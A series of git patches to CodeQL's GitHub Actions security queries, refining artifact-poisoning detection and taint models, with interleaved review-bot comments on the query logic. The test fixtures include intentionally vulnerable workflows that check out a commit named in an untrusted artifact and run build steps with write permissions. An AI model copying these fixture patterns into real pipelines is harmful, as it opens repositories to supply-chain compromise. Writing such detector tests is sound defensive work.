+| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | 
@@ -403,6 +412,10 @@ nodes | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | github.event.changes.head.ref.from | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -466,6 +479,7 @@ subpaths | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | From 71960b3ddd80a3686a9912d4650fc33e13507680 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 25 Sep 2024 18:22:46 +0200 Subject: [PATCH 541/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index ecde4c83b206..dc2e1b8e71d1 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.54 +version: 0.1.55 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index cddb4f61bf65..313c90a1423a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.54 +version: 0.1.55 groups: [actions, queries] suites: codeql-suites extractor: javascript From 010ad359d7059cbe357a129b26fb237a5cb2fd70 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 10:28:44 +0200 Subject: [PATCH 542/707] Add new sources and summary steps --- ql/lib/ext/manual/AsasInnab_regex-action.model.yml | 6 ++++++ ql/lib/ext/manual/MeilCli_regex-match.model.yml | 8 ++++++++ .../manual/actions-ecosystem_action-regex-match.model.yml | 6 ++++++ .../manual/dsfx3d_action-extract-unique-matches.model.yml | 6 ++++++ ql/lib/ext/manual/kaisugi_action-regex-match.model.yml | 7 +++++++ .../manual/paulschuberth_regex-extract-action.model.yml | 7 +++++++ ql/lib/ext/manual/release-kit_regex.model.yml | 7 +++++++ ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml | 7 +++++++ .../ext/manual/tmelliottjr_extract-regex-action.model.yml | 8 ++++++++ 9 files changed, 62 insertions(+) create mode 100644 ql/lib/ext/manual/AsasInnab_regex-action.model.yml create mode 100644 ql/lib/ext/manual/MeilCli_regex-match.model.yml create mode 100644 ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml create mode 100644 ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml create mode 100644 ql/lib/ext/manual/kaisugi_action-regex-match.model.yml create mode 100644 ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml create mode 100644 ql/lib/ext/manual/release-kit_regex.model.yml create mode 100644 ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml create mode 100644 ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml 
diff --git a/ql/lib/ext/manual/AsasInnab_regex-action.model.yml b/ql/lib/ext/manual/AsasInnab_regex-action.model.yml
new file mode 100644
index 000000000000..2efaefb95b62
--- /dev/null
+++ b/ql/lib/ext/manual/AsasInnab_regex-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["AsasInnab/regex-action", "*", "input.search_string", "output.first_match", "taint", "manual"]
diff --git a/ql/lib/ext/manual/MeilCli_regex-match.model.yml b/ql/lib/ext/manual/MeilCli_regex-match.model.yml
new file mode 100644
index 000000000000..74a0f43fd91c
--- /dev/null
+++ b/ql/lib/ext/manual/MeilCli_regex-match.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["MeilCli/regex-match", "*", "input.search_string", "output.matched_first", "taint", "manual"]
+ - ["MeilCli/regex-match", "*", "input.search_string", "output.matched_json", "taint", "manual"]
+
diff --git a/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml b/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml
new file mode 100644
index 000000000000..edc9585b5481
--- /dev/null
+++ b/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["actions-ecosystem/action-regex-match", "*", "input.text", "output.*", "taint", "manual"]
diff --git a/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml b/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml
new file mode 100644
index 000000000000..226a151dabab
--- /dev/null
+++ b/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["dsfx3d/action-extract-unique-matches", "*", "input.text", "output.matches", "taint", "manual"]
diff --git a/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml b/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml
new file mode 100644
index 000000000000..3e646e4482f2
--- /dev/null
+++ b/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["kaisugi/action-regex-match", "*", "input.text", "output.*", "taint", "manual"]
+
diff --git a/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml b/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml
new file mode 100644
index 000000000000..d1d930168dc8
--- /dev/null
+++ b/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["paulschuberth/regex-extract-action", "*", "input.haystack", "output.matches", "taint", "manual"]
+
diff --git a/ql/lib/ext/manual/release-kit_regex.model.yml b/ql/lib/ext/manual/release-kit_regex.model.yml
new file mode 100644
index 000000000000..5b2e5d9c4eb5
--- /dev/null
+++ b/ql/lib/ext/manual/release-kit_regex.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["release-kit/regex", "*", "input.string", "output.*", "taint", "manual"]
+
diff --git a/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml b/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml
new file mode 100644
index 000000000000..a0dfb648875e
--- /dev/null
+++ b/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["tim-actions/get-pr-commits", "*", "output.commits", "text", "manual"]
+
diff --git a/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml b/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml
new file mode 100644
index 000000000000..73fd66c11b9d
--- /dev/null +++ b/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["tmelliottjr/extract-regex-action", "*", "input.input", "output.resultString", "taint", "manual"] + - ["tmelliottjr/extract-regex-action", "*", "input.input", "output.resultArray", "taint", "manual"] + From 26f829eff4888306fe190c666a4f4b889538650b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 10:29:47 +0200 Subject: [PATCH 543/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index dc2e1b8e71d1..8447d10d94bf 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.55 +version: 0.1.56 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 313c90a1423a..b167a960886d 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.55 +version: 0.1.56 groups: [actions, queries] suites: codeql-suites extractor: javascript From 86c1d9c30f9b777e03d7a863b48145a06ecb33d5 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 12:35:10 +0200 Subject: [PATCH 544/707] Improve artifact poisoning query Better check of download path Add downloading to /tmp as a sanitizer --- .../codeql/actions/dataflow/FlowSources.qll | 2 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 3 +- .../security/ArtifactPoisoningQuery.qll | 68 +++++++++++-------- .../actions/download-artifact-2/action.yaml | 32 +++++++++ .../actions/download-artifact/action.yaml | 32 +++++++++ .../.github/workflows/artifactpoisoning91.yml | 29 ++++++++ .../.github/workflows/artifactpoisoning92.yml | 29 ++++++++ .../ArtifactPoisoningCritical.expected | 11 +++ .../CWE-829/ArtifactPoisoningMedium.expected | 9 +++ .../UntrustedCheckoutCritical.expected | 18 +++++ 10 files changed, 200 insertions(+), 33 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index ce2115847495..4682e7b1abfe 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -107,7 +107,7 @@ class MaDSource extends RemoteFlowSource { /** * A downloaded artifact. */ -private class ArtifactSource extends RemoteFlowSource { +class ArtifactSource extends RemoteFlowSource { ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "artifact" } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 9ca17eb4dab2..4b8cff4f4281 100644 
--- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -263,12 +263,11 @@ predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { // /** - * A download artifact step followed by a envvar-injection uses step . + * A download artifact step followed by a uses step . */ predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Step artifact, Uses uses | controlledCWD(artifact) and - madSink(succ, "envvar-injection") and pred.asExpr() = artifact and succ.asExpr() = uses and artifact.getAFollowingStep() = uses diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 6881caccd52e..236cc4d80914 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -7,10 +7,7 @@ import codeql.actions.security.PoisonableSteps string unzipRegexp() { result = ".*(unzip|tar)\\s+.*" } -string unzipDirArgRegexp() { - result = "-d\\s+\"([^ ]+)\".*" or - result = "-d\\s+'([^ ]+)'.*" -} +string unzipDirArgRegexp() { result = "-d\\s+([^ ]+).*" } abstract class UntrustedArtifactDownloadStep extends Step { abstract string getPath(); @@ -164,11 +161,11 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) else if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) then result = "" 
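Review bot: The rewritten doc comment `* A download artifact step followed by a uses step .` keeps a stray space before the period and no longer says why the `madSink(succ, "envvar-injection")` restriction was removed, so a reader now sees a step that links every `uses` step after a controlled-CWD download with no hint of where the narrowing happens. Since the sink side in ArtifactPoisoningSink only accepts a `UsesStep` when `download.getPath() = ""`, the comment should say so, e.g. `* A download artifact step (into a controlled CWD) followed by any uses step; the artifact-poisoning sink further restricts this to artifacts extracted into the working directory.` The predicate's closing `)` and `}` lie outside the hunk.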
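Review bot: The new `unzipDirArgRegexp()` value `-d\\s+([^ ]+).*` is, in every use visible here, appended to `unzipRegexp()`, which matches both `unzip` and `tar`; tar's extraction-directory flag is `-C`/`--directory`, so a `tar -xf artifact.tar -C /tmp/out` line never yields a directory, `getPath()` falls back to `""` (the workspace) and the new /tmp exclusion never applies to it, while a GNU tar `-d` (`--diff`) would be misread as a directory. A non-capturing alternation keeps the `regexpCapture(..., 2)` callers intact: `string unzipDirArgRegexp() { result = "(?:-d|-C|--directory[= ])\\s*([^ ]+).*" }`. Note also that `[^ ]+` stops at the first space, so `-d "my dir"` would presumably capture `"my` before `trimQuotes` runs; if paths with spaces are deliberately unsupported, a comment on the predicate saying so would help.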
@@ -199,13 +196,14 @@ class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then - result = script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) or result = - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + trimQuotes(script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) or + result = + trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) else if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) or 
@@ -245,37 +243,47 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { .splitAt("\n") .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then - result = script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) or result = - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + trimQuotes(script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) or + result = + trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) else result = "" } } class ArtifactPoisoningSink extends DataFlow::Node { + UntrustedArtifactDownloadStep download; + PoisonableStep poisonable; + ArtifactPoisoningSink() { - exists(UntrustedArtifactDownloadStep download, PoisonableStep poisonable | - download.getAFollowingStep() = poisonable and - ( - poisonable.(Run).getScriptScalar() = this.asExpr() - or - poisonable.(UsesStep) = this.asExpr() - ) and + download.getAFollowingStep() = poisonable and + // excluding artifacts downloaded to /tmp + not download.getPath().regexpMatch("^/tmp.*") and + ( + poisonable.(Run).getScriptScalar() = this.asExpr() and ( // Check if the poisonable step is a local script execution step // and the path of the command or script matches the path of the downloaded artifact - not poisonable instanceof LocalScriptExecutionRunStep or + // Checking the path for non local script execution steps is very difficult + not poisonable instanceof LocalScriptExecutionRunStep + or + // TODO: account for Run's working directory poisonable .(LocalScriptExecutionRunStep) .getCommand() .matches(["./", ""] + download.getPath() + "%") ) + or + poisonable.(UsesStep) = this.asExpr() and + download.getPath() = "" ) } + + string getPath() { result = download.getPath() } } /** 
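Review bot: The new `not download.getPath().regexpMatch("^/tmp.*")` guard is evaluated before the whole Run/UsesStep disjunction, so it also disables the `LocalScriptExecutionRunStep` branch that compares the command against `download.getPath()`: an artifact unpacked with `-d /tmp/artifacts` and then run as `bash /tmp/artifacts/run.sh` is no longer a sink, although that branch was written for exactly this comparison (assuming `getCommand()` yields the script path). Extraction into /tmp only justifies skipping the non-local branch (`make`, `npm install`, ...), so the guard belongs inside that branch, and `^/tmp.*` should be `^/tmp(/.*)?$` so that a path such as `/tmpfoo` is not exempted. Note also that `getPath()` can have several values (the `or`-ed `trimQuotes(...)` bindings in the hunks above), and `not ... regexpMatch` then suppresses the sink as soon as any one of them is under /tmp. The exemption further assumes that nothing later copies `/tmp/...` into the workspace or executes from it, which the query cannot see; a comment stating that assumption would help a maintainer. The leading lines of the hunk belong to `DirectArtifactDownloadStep.getPath()`, whose start is outside the hunk.
```ql
  ArtifactPoisoningSink() {
    download.getAFollowingStep() = poisonable and
    (
      poisonable.(Run).getScriptScalar() = this.asExpr() and
      (
        // Non-local execution (make, npm install, ...): the artifact only matters when it was
        // unpacked into the workspace, so downloads under /tmp are excluded for this branch only.
        // Assumes /tmp is neither on PATH nor copied into the workspace later.
        not poisonable instanceof LocalScriptExecutionRunStep and
        not download.getPath().regexpMatch("^/tmp(/.*)?$")
        or
        // Local script execution: keep the path comparison wherever the artifact landed,
        // so that `bash /tmp/artifacts/run.sh` after `-d /tmp/artifacts` is still a sink.
        // TODO: account for Run's working directory
        poisonable
            .(LocalScriptExecutionRunStep)
            .getCommand()
            .matches(["./", ""] + download.getPath() + "%")
      )
      or
      poisonable.(UsesStep) = this.asExpr() and
      download.getPath() = ""
    )
  }
```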
@@ -283,7 +291,7 @@ class ArtifactPoisoningSink extends DataFlow::Node { * that is used may lead to artifact poisoning */ private module ArtifactPoisoningConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + predicate isSource(DataFlow::Node source) { source instanceof ArtifactSource } predicate isSink(DataFlow::Node sink) { sink instanceof ArtifactPoisoningSink } } diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml b/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml new file mode 100644 index 000000000000..4241647d3e11 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml @@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh + shell: bash 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml b/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml new file mode 100644 index 000000000000..0c2059521020 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml @@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip -d /tmp/artifacts + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh /tmp/artifacts + shell: bash diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml new file mode 100644 index 000000000000..af9f01b572f1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml 
@@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml new file mode 100644 index 000000000000..e35bc73c3bda --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml 
@@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact-2 + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 11c6b98dc874..74edee72f5f1 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected 
@@ -1,4 +1,7 @@ edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | 
@@ -14,7 +17,10 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | 